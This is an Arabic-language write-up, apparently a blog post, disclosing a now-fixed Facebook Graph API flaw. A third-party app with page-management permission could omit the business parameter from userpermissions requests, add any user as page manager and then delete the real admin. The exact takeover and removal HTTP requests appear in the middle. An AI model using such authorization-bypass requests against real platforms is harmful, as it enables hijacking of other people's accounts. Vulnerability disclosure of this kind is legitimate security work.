تسمح الثغرة الأمنية في نقطة نهاية Facebook business manager لأحد تطبيقات الطرف الثالث باختراق صفحة حساب Facebook بأذونات محدودة وسيفقد الضحية وصول المشرف نهائيًا إلى الصفحة.
بشكل افتراضي ، لا تسمح واجهة تطبيق Facebook لتطبيقات الجهات الخارجية بإضافة أو تعديل أدوار مسؤول الصفحة (أدوار الصفحة مثل مدير أو محرر أو محلل إلخ). يُسمح لتطبيقات الجهات الخارجية بتنفيذ جميع العمليات مثل حالات النشر نيابة عنك ، ونشر الصور ، وما إلى ذلك باستثناء إضافة أدوار المشرف لأنه إذا سمح للتطبيق بإضافة مدراء أو إزالتهم ، فقد يضيف بعض المستخدمين كمسؤول إلى الصفحة وإزالة المالك الفعلي بشكل دائم.
من ناحية أخرى ، هناك نقطة نهاية لصفحات العمل تدعى userpermissions والتي تسمح بإضافة أو إزالة أدوار مسؤولي صفحة العمل الذين يتعاملون بالفعل مع أعمال Facebook.
الطلب التالي سيجعل المستخدم المستهدف هو المشرف على الصفحة.
Request :- POST /<page_id>/userpermissions HTTP/1.1 Host : graph.facebook.com Content-Length: 245 role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<application_access_token> Response:- true
بعد بضع دقائق من الاختبار ، تعرفت على أن إزالة معلمة العمل من الطلب لم تتسبب في أي خطأ وتسمح لنا بإضافة أي شخص كمسؤول جديد للصفحة وحذف مسؤول الصفحة الفعلي على الصفحة غير التجارية حيث التطبيق لديه إذن إدارة.
هذا هو! أيا كان التطبيق ، إذا كان لديه إذن manager_pages من المسؤول ، فيمكنه اختراق جميع صفحات حسابه على Facebook في غضون ثوانٍ معدودة.
الاستيلاء على الصفحة:
Request :- POST /<page_id>/userpermissions HTTP/1.1 Host : graph.facebook.com Content-Length: 245 role=MANAGER&user=<target_user_id>&access_token=<application_access_token> true
إزالة الضحية:
Request :- Delete /<page_id>/userpermissions HTTP/1.1 Host : graph.facebook.com Content-Length: 245 user=<target_user_id>&access_token=<application_access_token> Response:- true
هذا كل شئ! تم اختراق الصفحة المستهدفة!
تم الإبلاغ عن مشكلة عدم الحصانة هذه أمام فريق أمان Facebook وتم حلها تمامًا الآن.
سوف يبدو مربع حوار الأذونات هكذا
إذا تم طلب manager_pages ، يرجى ملاحظة أن هذا التطبيق سيكون قادرًا على إدارة صفحاتك (نشر الحالات ، نشر الصور ، إلخ.)
لا يحتاج الأشخاص للقلق ، فلا يزال بإمكانك تعديل الأذونات التي منحتها للتطبيقات الأخرى هنا.
يمكنك أيضًا قراءة كيفية كسب المال من خلال المدونات في مقالتنا. إنه دليل A-Z على التدوين يساعدك في الحصول على أول شيك لك.